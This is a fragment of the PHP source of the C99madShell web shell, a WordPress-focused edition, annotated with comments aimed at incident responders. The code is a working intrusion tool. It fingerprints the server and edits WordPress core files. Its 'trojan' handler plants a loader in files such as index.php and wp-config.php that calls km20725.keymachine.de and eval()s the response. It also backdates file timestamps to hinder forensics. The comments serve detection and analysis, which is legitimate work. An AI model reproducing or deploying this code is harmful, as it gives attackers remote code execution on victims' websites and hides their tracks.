#FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; 
border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='wp_act' type='hidden' value=''><input name='wp_path' type='hidden' value='<?php if(isset($wp_path)) echo($wp_path);?>'><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr> | |
<tr><td> | |
<p align="left"><b>Software: <?php echo $DISP_SERVER_SOFTWARE; ?></b> </p> | |
<p align="left"><b>System: <?php echo substr(php_uname(),0,90); ?></b> </p> | |
<?php | |
// Shows "User/Group" in the status header. get_current_user() returns the
// owner of this script file, and the group is the effective group of the PHP
// process, so the pair is not necessarily the account the process runs as.
if(!$win && function_exists('posix_getgrgid') && function_exists('posix_getegid')) { | |
echo('<p align="left"><b>User/Group: '); | |
$groupinfo = posix_getgrgid(posix_getegid()); | |
echo(get_current_user().'/'.$groupinfo['name']); | |
echo('</b> </p>'); | |
} | |
?> | |
<p align="left"><b>Php version: <a href="#" onclick="document.todo.act.value='phpinfo';document.todo.submit();"><b><u><?php echo(phpversion()) ?></u></b></a> | |
<p align="left"><b>Php modules: | |
<?php | |
// Lists the loaded PHP extensions: all of them in the tooltip, and those
// that also appear in $allow_ext (database, FTP, curl, IMAP, sockets) as text.
$cur_ext = get_loaded_extensions(); | |
echo('<font title="'.implode(',', $cur_ext).'">'); | |
$intersect = array_intersect($allow_ext, $cur_ext); | |
echo(implode(', ', $intersect)); | |
?> | |
</font></b> </p> | |
<?php | |
// Environment report shown on every page load: disabled PHP functions,
// presence of mod_security, and which of the programs in $allow_program and
// security tools in $allow_service are installed.
if($disablefunc) { | |
echo('<p align="left" style="color:red"><b>Disable functions: '.implode(', ', $disablefunc).'</b></p>'); | |
} | |
if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) { | |
echo('<p align="left" style="color:red"><b>Mod Security: YES</b></p>'); | |
} | |
// Detection: the two loops below run one `which <name>` shell command per
// list entry. A burst of `which` lookups for compiler, downloader and
// AV/IDS binary names by the web server account is a strong signal in
// process-creation logs.
if(!$win && $safemode === FALSE) { | |
$pro = array(); | |
$ser = array(); | |
foreach($allow_program as $program) { | |
if($locate = which($program)) { | |
$pro[] = '<font title="'.$locate.'">'.$program.'</font>'; | |
} | |
} | |
foreach($allow_service as $service) { | |
if($locate = which($service)) { | |
$ser[] = '<font title="'.$locate.'">'.$service.'</font>'; | |
} | |
} | |
if($pro) { | |
echo('<p align="left"><b>Install program: <font color="#00CCFF">'.implode(', ', $pro).'</font></b></p>'); | |
} | |
if($ser) { | |
echo('<p align="left"><b>Install service: '.implode(', ', $ser).'</b></p>'); | |
} | |
} | |
?> | |
<p align="left"><b>Allow_url_fopen: <?php echo((@ini_get('allow_url_fopen'))==1?'<font color="green">ON</font>':'<font color="red">OFF</font>'); ?></b></p> | |
<p align="left"><b>Allow_url_include: <?php echo((@ini_get('allow_url_include'))==1?'<font color="green">ON</font>':'<font color="red">OFF</font>'); ?></b></p> | |
<p align="left"><b>Safe-mode: <?php echo $hsafemode; ?></b></p> | |
<?php | |
// WordPress-specific part of this "BLOG edition". $wp_path is either taken
// from the request (hidden form field "wp_path") or guessed by found_wp();
// it is accepted when <path>wp-config.php exists. With a valid path the
// "Patch" and "Trojan" button rows are drawn.
if(isset($wp_path)) { | |
if(valid_wp_path($wp_path)) { | |
draw_patch(); | |
draw_trojan(); | |
} else { | |
unset($wp_path); | |
} | |
} | |
if(!isset($wp_path)) { | |
$wp_path = found_wp(); | |
if(valid_wp_path($wp_path)) { | |
draw_patch(); | |
draw_trojan(); | |
} else { | |
unset($wp_path); | |
} | |
} | |
// No installation found: offer a text field to set the path by hand.
if(!isset($wp_path)) { | |
echo('<p><font color=red>Wordpress Not Found! '); | |
echo('<input type=text id="wp_pat"><input type="submit" value="SET PATH" onclick="document.todo.act.value=\'ls\';document.todo.wp_path.value=document.getElementById(\'wp_pat\').value;document.todo.submit();"></p>'); | |
} | |
/**
 * Prints the "Trojan" button row.
 *
 * Each button submits act=trojan with wp_act naming one WordPress file
 * (index, wp-blog-header, wp-config, wp-settings, template-loader, template);
 * get_style() colours and enables the button by the state of that file. The
 * handler for act=trojan is not part of this excerpt.
 * Incident response: the files these names map to in get_style() are the
 * ones to compare against a clean WordPress release.
 */
function draw_trojan() { | |
echo('<p><font color=green>Trojan: </font> | |
<input type="submit" id="index" value="index" style="font-size: 6pt;'.get_style('index').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'index\';document.todo.submit();"/> | |
<input type="submit" id="wp-blog-header" value="wp-blog-header" style="font-size: 6pt;'.get_style('wp-blog-header').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-blog-header\';document.todo.submit();"/> | |
<input type="submit" id="wp-config" value="wp-config" style="font-size: 6pt;'.get_style('wp-config').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-config\';document.todo.submit();"/> | |
<input type="submit" id="wp-settings" value="wp-settings" style="font-size: 6pt;'.get_style('wp-settings').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'wp-settings\';document.todo.submit();"/> | |
<input type="submit" id="template-loader" value="template-loader" style="font-size: 6pt;'.get_style('template-loader').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'template-loader\';document.todo.submit();"/> | |
<input type="submit" id="template" value="template" style="font-size: 6pt;'.get_style('template').' onclick="document.todo.act.value=\'trojan\';document.todo.wp_act.value=\'template\';document.todo.submit();"/></p>'); | |
} | |
/**
 * Prints the "Patch" button row.
 *
 * Each button submits act=patch with wp_act set to xmlrpc1, xmlrpc2,
 * admin_ajax, blog_name_sql or tb_id. Judging by the marker strings in
 * is_patching(), these correspond to edits of xmlrpc.php, pluggable.php and
 * wp-trackback.php; the handler for act=patch is not part of this excerpt.
 * Incident response: source files that were edited without a WordPress
 * update are themselves a sign that this shell was used.
 */
function draw_patch() { | |
echo('<p><font color=green>Patch: </font> | |
<input type="submit" id="xmlrpc1" value="xmlrpc1" style="font-size: 6pt;'.get_style('xmlrpc1').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'xmlrpc1\';document.todo.submit();"/> | |
<input type="submit" id="xmlrpc2" value="xmlrpc2" style="font-size: 6pt;'.get_style('xmlrpc2').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'xmlrpc2\';document.todo.submit();"/> | |
<input type="submit" id="admin_ajax" value="admin_ajax" style="font-size: 6pt;'.get_style('admin_ajax').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'admin_ajax\';document.todo.submit();"/> | |
<input type="submit" id="blog_name_sql" value="blog_name_sql" style="font-size: 6pt;'.get_style('blog_name_sql').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'blog_name_sql\';document.todo.submit();"/> | |
<input type="submit" id="tb_id" value="tb_id" style="font-size: 6pt;'.get_style('tb_id').' onclick="document.todo.act.value=\'patch\';document.todo.wp_act.value=\'tb_id\';document.todo.submit();"/></p>'); | |
} | |
/**
 * Guesses the WordPress root directory from the current working directory.
 *
 * Order of attempts: the working directory itself (when valid_wp_path()
 * accepts it), the part of the path before a trailing "wp-<word>" component,
 * the path up to and including the first "blog", "wp", "wordpress" or
 * "blogs" match plus the next character.
 *
 * @return string|false Candidate path (not verified in the last two cases), or false.
 */
function found_wp() { | |
$path = @getcwd(); | |
if($path === false) { | |
return false; | |
} | |
if(valid_wp_path($path)) { | |
return $path; | |
} | |
if(preg_match('%(wp-(\w+)$)%i', $path, $ret)) { | |
$path = substr($path, 0, strpos($path, $ret[0])); | |
return $path; | |
} | |
if(preg_match('%(blog|wp|wordpress|blogs)%i', $path, $ret)) { | |
$path = substr($path, 0, strpos($path, $ret[0])+strlen($ret[0])+1); | |
return $path; | |
} | |
return false; | |
} | |
/**
 * Tells whether $path looks like a WordPress root.
 *
 * The file name is appended without a separator, so $path has to end with one.
 *
 * @param string|false $path Candidate directory.
 * @return bool True when <path>wp-config.php exists.
 */
function valid_wp_path($path) { | |
if($path === false) { | |
return false; | |
} | |
if(file_exists($path.'wp-config.php')) { | |
return true; | |
} else { | |
return false; | |
} | |
} | |
/**
 * Returns the tail of a button's style attribute for one patch/trojan target.
 *
 * The switch maps the button name to the WordPress file it concerns. The
 * returned fragment closes the style attribute and may add "disabled":
 * yellow/disabled = the file already contains the marker checked by
 * is_patching(); green = the file is writable and not yet modified;
 * dark red/disabled = not writable and not modified.
 *
 * @param string $vuln Button name.
 * @return string|false Style fragment, or false for an unknown name.
 */
function get_style($vuln) { | |
global $wp_path; | |
switch($vuln) { | |
case 'xmlrpc1': | |
case 'xmlrpc2': $file = $wp_path.'xmlrpc.php'; break; | |
case 'admin_ajax': $file = file_exists($wp_path.'wp-includes/pluggable.php')?$wp_path.'wp-includes/pluggable.php':$wp_path.'wp-includes/pluggable-functions.php'; break; | |
case 'blog_name_sql': $file = $wp_path.'wp-trackback.php'; break; | |
case 'tb_id': $file = $wp_path.'wp-trackback.php'; break; | |
case 'index': $file = $wp_path.'index.php'; break; | |
case 'wp-blog-header': $file = $wp_path.'wp-blog-header.php'; break; | |
case 'wp-config': $file = $wp_path.'wp-config.php'; break; | |
case 'wp-settings': $file = $wp_path.'wp-settings.php'; break; | |
case 'template-loader': $file = $wp_path.'wp-includes/template-loader.php'; break; | |
// NOTE(review): the extension reads ".ph" in the sample as published.
case 'template': $file = $wp_path.'wp-trackback.ph'; break; | |
default: return false; | |
} | |
if(!is_writable($file) && is_patching($vuln, $file)) { | |
$style = 'background-color: yellow; color: black" disabled'; | |
} elseif(is_writable($file) && is_patching($vuln, $file)) { | |
$style = 'background-color: yellow; color: black" disabled'; | |
} elseif(is_writable($file) && !is_patching($vuln, $file)) { | |
$style = 'background-color: green; color: white"'; | |
} else { | |
$style = 'background-color: #800000; color: #FFFFFF" disabled'; | |
} | |
return $style; | |
} | |
// Reads $file and reports whether it already contains the marker string that | |
// belongs to the action key $vuln, i.e. whether this kit has already modified | |
// the file. Returns true or false for a known key; an empty or unreadable file | |
// counts as false (read errors are suppressed with @). For an unknown key the | |
// function falls off the end and returns null. | |
// For responders: each literal searched for below doubles as a content | |
// indicator when sweeping a WordPress tree for this kit's edits. | |
function is_patching($vuln, $file) { | |
// Loader targets: the marker is the hostname that the injected loader in | |
// this script's "trojan" handler contacts. | |
if($vuln == 'index' || $vuln == 'wp-blog-header' || $vuln == 'wp-config' || $vuln == 'wp-settings' || $vuln == 'template-loader' || $vuln == 'template') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, 'km20725.keymachine.de') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
// xmlrpc.php: marker is the pingback.ping registration in commented-out form. | |
} elseif($vuln == 'xmlrpc1') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '//\'pingback.ping\' => \'this:pingback_ping\',') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
// xmlrpc.php: marker is the getPingbacks registration in commented-out form. | |
} elseif($vuln == 'xmlrpc2') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '//\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
// pluggable file: marker is the escape() call the patch handler inserts. | |
} elseif($vuln == 'admin_ajax') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '$user_login = $wpdb->escape($user_login);') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
// wp-trackback.php: marker is the inserted escape() of $blog_name. | |
} elseif($vuln == 'blog_name_sql') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '$blog_name = $wpdb->escape($blog_name);') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
// wp-trackback.php: marker is the inserted intval() of $tb_id. | |
} elseif($vuln == 'tb_id') { | |
$content = @implode('', @file($file)); | |
if(!$content) { | |
return false; | |
} | |
if(strpos($content, '$tb_id = intval($tb_id);') !== FALSE) { | |
return true; | |
} else { | |
return false; | |
} | |
} | |
} | |
?> | |
<p align="left"><?php | |
// Panel header: normalises the working directory $d, prints it as a clickable | |
// breadcrumb, shows whether it is writable, lists drive letters on Windows and | |
// prints the quick-launch links. $d, $sort, $win, $quicklaunch and $act are set | |
// before this excerpt (presumably from the request and the shell's config). | |
// Every link drives a form referenced as document.todo by filling its fields | |
// act, d and sort and submitting it; that form is defined outside this excerpt. | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
// Empty $d falls back to the script's own directory; otherwise $d is resolved | |
// with realpath() when that succeeds and left as given when it does not. | |
if (empty($d)) {$d = @realpath(".");} elseif(@realpath($d)) {$d = @realpath($d);} | |
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); | |
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} | |
$d = str_replace("\\\\","\\",$d); | |
$dispd = htmlspecialchars($d); | |
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); | |
$i = 0; | |
// One link per path component; $t is rebuilt as the path up to component $i. | |
foreach($pd as $b) | |
{ | |
$t = ""; | |
$j = 0; | |
foreach ($e as $r) | |
{ | |
$t.= $r.DIRECTORY_SEPARATOR; | |
if ($j == $i) {break;} | |
$j++; | |
} | |
echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; | |
$i++; | |
} | |
echo " "; | |
// $wd / $wdt record whether the web-server account can write to $d. | |
if (@is_writable($d)) | |
{ | |
$wd = TRUE; | |
$wdt = "<font color=green>[ ok ]</font>"; | |
echo "<b><font color=green>".view_perms(@fileperms($d))."</font></b>"; | |
} | |
else | |
{ | |
$wd = FALSE; | |
$wdt = "<font color=red>[ Read-Only ]</font>"; | |
echo "<b>".view_perms_color($d)."</b>"; | |
} | |
echo "<br>"; | |
$letters = ""; | |
// Windows only: a: to z: are probed with is_dir(); letters listed in | |
// $safemode_diskettes (defined elsewhere) are shown without being probed. | |
if ($win) | |
{ | |
$v = explode("\\",$d); | |
$v = $v[0]; | |
foreach (range("a","z") as $letter) | |
{ | |
$bool = $isdiskette = in_array($letter,$safemode_diskettes); | |
if (!$bool) {$bool = @is_dir($letter.":\\");} | |
if ($bool) | |
{ | |
$letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ "; | |
if (strtolower($letter.':') != strtolower($v)) {$letters .= $letter;} | |
else {$letters .= "<font color=\"#00FF66\">".$letter."</font>";} | |
$letters .= " ]</a> "; | |
} | |
} | |
if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} | |
} | |
// Quick-launch entries are [label, url-template] pairs; %d, %sort and %upd are | |
// replaced by the current directory, the sort key and the parent directory. | |
if (count($quicklaunch) > 0) | |
{ | |
foreach($quicklaunch as $item) | |
{ | |
$item[1] = str_replace("%d",urlencode($d),$item[1]); | |
$item[1] = str_replace("%sort",$sort,$item[1]); | |
$v = @realpath($d.".."); | |
if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} | |
$item[1] = str_replace("%upd",urlencode($v),$item[1]); | |
echo "<a href=\"".$item[1]."\">".$item[0]."</a> "; | |
} | |
} | |
echo "</p></td></tr></table><br>"; | |
if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} | |
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; | |
// With no action requested the panel defaults to the directory listing. | |
if ($act == "") {$act = $dspact = "ls";} | |
// act=patch: edits WordPress core files in place, selected by $wp_act. | |
// xmlrpc1 / xmlrpc2 comment out the pingback.ping and | |
// pingback.extensions.getPingbacks registrations in xmlrpc.php; admin_ajax adds | |
// a $wpdb->escape() line after sanitize_user() in the pluggable file(s); | |
// blog_name_sql and tb_id add an escape() / intval() line to wp-trackback.php. | |
// NOTE(review): the code does not say why an intruder hardens the site; | |
// presumably to keep other intruders from using the same entry points. | |
// For responders: a core file that differs from the release only by one of | |
// these lines points to this kit rather than to an administrator's hotfix. | |
// save_file() (top of the file) reads the file's mtime before it writes; what | |
// it does with it is outside this excerpt, so compare content hashes instead | |
// of trusting modification times. | |
if($act == 'patch') { | |
$vuln = $wp_act; | |
if($vuln == 'xmlrpc1') { | |
$content = @implode('', @file($wp_path.'xmlrpc.php')); | |
$content = str_replace('\'pingback.ping\' => \'this:pingback_ping\',', '//\'pingback.ping\' => \'this:pingback_ping\',', $content); | |
$result = save_file($wp_path.'xmlrpc.php', $content); | |
} elseif($vuln == 'xmlrpc2') { | |
$content = @implode('', @file($wp_path.'xmlrpc.php')); | |
$content = str_replace('\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',', '//\'pingback.extensions.getPingbacks\' => \'this:pingback_extensions_getPingbacks\',', $content); | |
$result = save_file($wp_path.'xmlrpc.php', $content); | |
} elseif($vuln == 'admin_ajax') { | |
// Both file names are tried; $result keeps only the outcome of the last | |
// save, and stays unset when neither file exists. | |
if(file_exists($wp_path.'wp-includes/pluggable.php')) { | |
$content = @implode('', @file($wp_path.'wp-includes/pluggable.php')); | |
$content = str_replace('$user_login = sanitize_user( $user_login );', '$user_login = sanitize_user( $user_login );'."\n\t".'$user_login = $wpdb->escape($user_login); ', $content); | |
$result = save_file($wp_path.'wp-includes/pluggable.php', $content); | |
} | |
if(file_exists($wp_path.'wp-includes/pluggable-functions.php')) { | |
$content = @implode('', @file($wp_path.'wp-includes/pluggable-functions.php')); | |
$content = str_replace('$user_login = sanitize_user( $user_login );', '$user_login = sanitize_user( $user_login );'."\n\t".'$user_login = $wpdb->escape($user_login); ', $content); | |
$result = save_file($wp_path.'wp-includes/pluggable-functions.php', $content); | |
} | |
} elseif($vuln == 'blog_name_sql') { | |
$content = @implode('', @file($wp_path.'wp-trackback.php')); | |
$content = str_replace('if ( is_single() || is_page() )', '$blog_name = $wpdb->escape($blog_name);'."\n".'if ( is_single() || is_page() )', $content); | |
$result = save_file($wp_path.'wp-trackback.php', $content); | |
} elseif($vuln == 'tb_id') { | |
$content = @implode('', @file($wp_path.'wp-trackback.php')); | |
// The preg_match() result is not checked: without a match $ret[1] is unset | |
// and the replacement below finds nothing, yet the file is still rewritten. | |
preg_match('%\$tb_url(\s+)= \$_POST\[\'url\'\];%i', $content, $ret); | |
$content = str_replace('$tb_url'.$ret[1].'= $_POST[\'url\'];', '$tb_id = intval($tb_id); '."\n".'$tb_url = $_POST[\'url\'];', $content); | |
$result = save_file($wp_path.'wp-trackback.php', $content); | |
} else { | |
$result = false; | |
} | |
// "OK" reflects only save_file()'s return value, not whether the searched text | |
// was found and replaced. $vuln is written into the script block unescaped. | |
if(isset($result) && $result) { | |
echo('<center><font color="green"><b>Patching OK!!!</b></font></center>'); | |
echo('<script>document.getElementById(\''.$vuln.'\').style.cssText="font-size: 6pt;background-color: yellow; color: black";document.getElementById(\''.$vuln.'\').disabled=true;</script>'); | |
} else { | |
echo('<center><font color="red"><b>Patching NO!!!</b></font></center>'); | |
} | |
// Falls through to the listing of the WordPress root. | |
$d = $wp_path; | |
$act = 'ls'; | |
} | |
// act=trojan: prepends a PHP loader to one WordPress file chosen by $wp_act | |
// (index.php, wp-blog-header.php, wp-config.php, wp-settings.php or | |
// wp-includes/template-loader.php under $wp_path). Once planted, any request | |
// that executes that file and carries a "p" query parameter makes the site | |
// send SERVER_NAME and the value of p to km20725.keymachine.de and eval() | |
// whatever that host returns. | |
// Indicators for responders, all taken from the literals below: the hostname | |
// km20725.keymachine.de inside any of those five files; a file that opens with | |
// if(isset($_GET['p'])) ahead of its normal WordPress content; outbound HTTP | |
// from the web server to that host for /server/index.php with host= and p= . | |
// Deleting the shell does not remove this loader; the affected files have to | |
// be restored from a known-good copy of the same WordPress release. | |
if($act =='trojan') { | |
// No default branch: an unrecognised $wp_act leaves $file unset or holding | |
// whatever an earlier part of the script put there. | |
switch($wp_act) { | |
case 'index': $file = $wp_path.'index.php'; break; | |
case 'wp-blog-header': $file = $wp_path.'wp-blog-header.php'; break; | |
case 'wp-config': $file = $wp_path.'wp-config.php'; break; | |
case 'wp-settings': $file = $wp_path.'wp-settings.php'; break; | |
case 'template-loader': $file = $wp_path.'wp-includes/template-loader.php'; break; | |
//case 'template': $file = $wp_path.'wp-trackback.ph'; break; | |
} | |
$content = @implode('', @file($file)); | |
// The loader text depends on the victim's PHP settings at planting time. | |
if(@ini_get('allow_url_fopen')==1) { | |
// Variant 1: fetch over http with file_get_contents(), then eval(). | |
$trojan = '<?php if(isset($_GET[\'p\'])) { | |
@eval(@file_get_contents(\'http://km20725.keymachine.de/server/index.php?host=\'.$_SERVER[\'SERVER_NAME\'].\'&p=\'.$_GET[\'p\'])); | |
} ?>'."\n"; | |
} else { | |
// Variant 2: hand-written HTTP/1.0 GET over fsockopen() to port 80, then | |
// eval() of everything after the response header block. | |
$trojan = '<?php if(isset($_GET[\'p\'])) { | |
$sock = @fsockopen(\'km20725.keymachine.de\', 80); | |
if($sock){ | |
fwrite ($sock, \'GET http://km20725.keymachine.de/server/index.php?host=\'.$_SERVER[\'SERVER_NAME\'].\'&p=\'.$_GET[\'p\'].\' HTTP/1.0\'."\r\n"); | |
fwrite ($sock, \'Host: km20725.keymachine.de\'."\r\n\r\n"); | |
while($content[] = fgets ($sock)); | |
$content = implode(\'\', $content); | |
@eval(trim(substr($content, strpos($content, "\r\n\r\n")))); | |
fclose ($sock);} | |
} ?>'."\n"; | |
} | |
// The original content is kept and follows the loader. | |
$content = $trojan.$content; | |
$result = save_file($file, $content); | |
if($result) { | |
echo('<center><font color="green"><b>Trojaning OK!!!</b></font></center>'); | |
echo('<script>document.getElementById(\''.$wp_act.'\').style.cssText="font-size: 6pt;background-color: yellow; color: black";document.getElementById(\''.$wp_act.'\').disabled=true;</script>'); | |
} else { | |
echo('<center><font color="red"><b>Trojaning NO!!!</b></font></center>'); | |
} | |
// Falls through to the listing of the WordPress root. | |
$d = $wp_path; | |
$act = 'ls'; | |
} | |
// act=mkdir: creates the directory named by $mkdir unless it equals the | |
// current directory $d or already exists, then falls through to the listing. | |
// Only the two failure cases print a message; success is silent. | |
if ($act == "mkdir") | |
{ | |
if ($mkdir != $d) | |
{ | |
if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} | |
elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} | |
echo "<br><br>"; | |
} | |
$act = $dspact = "ls"; | |
} | |
// act=d: prints permissions and the three timestamps (ctime, atime, mtime) of | |
// the directory $d; the permissions cell links to the chmod handler. | |
if ($act == "d") | |
{ | |
if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} | |
else | |
{ | |
echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; | |
if (!$win) | |
{ | |
echo "<tr><td><b>Owner/Group</b></td><td> "; | |
// The owner/group text is stored in $row[] but never echoed in this block, | |
// so the table cell opened above stays empty. | |
$ow = posix_getpwuid(fileowner($d)); | |
$gr = posix_getgrgid(filegroup($d)); | |
$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); | |
} | |
echo "<tr><td><b>Perms</b></td><td><a href=\"#\" onclick=\"document.todo.act.value='chmod';document.todo.d.value='".urlencode($d)."';document.todo.submit();\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; | |
} | |
} | |
// act=phpinfo: discards the page built so far, prints phpinfo() and ends the | |
// request through c99shexit() (defined elsewhere). This hands the operator the | |
// server's PHP configuration, loaded modules and environment in one page. | |
if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} | |
// act=mkfile: creates an empty file at $mkfile with fopen(...,"w") and then | |
// switches to the file handler (act=f) with $d / $f pointing at the new file. | |
// The handle returned by fopen() is not kept or closed in this block. | |
if ($act == "mkfile") | |
{ | |
if ($mkfile != $d) | |
{ | |
if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} | |
elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} | |
else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} | |
} | |
else {$act = $dspact = "ls";} | |
} | |
// act=selfremove: deletes the shell's own file with unlink(__FILE__) once the | |
// typed value $submit equals $rndcode. $rndcode is the three-digit code this | |
// handler placed in a hidden field of its own form, so the check guards | |
// against a stray click, not against another caller. | |
// For responders: a missing shell file does not mean the host is clean. The | |
// loader planted by the trojan handler, the edits made by the patch handler | |
// and any uploaded files stay behind. The banner text "c99madshell" names the | |
// shell family. | |
if ($act == "selfremove") | |
{ | |
if (($submit == $rndcode) and ($submit != "")) | |
{ | |
if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); } | |
else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} | |
} | |
else | |
{ | |
if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} | |
// Fresh three-digit code for the next attempt, sent back in the hidden field. | |
$rnd = rand(0,9).rand(0,9).rand(0,9); | |
echo "<form method=\"POST\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>"; | |
} | |
} | |
// act=touch: shows a date picker for the path $d.$f and, on submit, sets both | |
// the access and the modification time of that path to the chosen date with | |
// touch(). Symlinks and the entries "." and ".." are refused. | |
// For responders: mtime and atime of anything under the web root may have been | |
// set by hand through this handler, so timeline work should lean on content | |
// hashes, the inode change time and server or backup records rather than on | |
// these two stamps. | |
if($act == 'touch') { | |
if(is_link($d.$f) || $f == '.' || $f == '..') { | |
echo('<font color="red">ONLY FILE AND CATALOGS!!!</font>'); | |
$act = 'ls'; | |
} else { | |
if(!isset($submit)) { | |
// Current mtime split into day, month, year, hour, minute, second; used to | |
// preselect the options below. | |
$time_array = explode(':',@date("d:m:Y:H:i:s",@filemtime($d.$f))); | |
echo(" | |
<form method=\"POST\"> | |
<input name='act' type='hidden' value='touch'> | |
<input name='f' type='hidden' value='".urlencode($f)."'> | |
<input name='d' type='hidden' value='".urlencode($d)."'> | |
<input type=submit name=submit value=\"Save\"> | |
<input type=\"reset\" value=\"Reset\"> | |
<input type=\"button\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".addslashes(substr($d,0,-1))."';document.todo.submit();\" value=\"Back\"><br>Current file's time: ".@date("d.m.Y H:i:s", filemtime($d.$f)).' | |
<br />Set new date: | |
<select name="day" size="1">'); | |
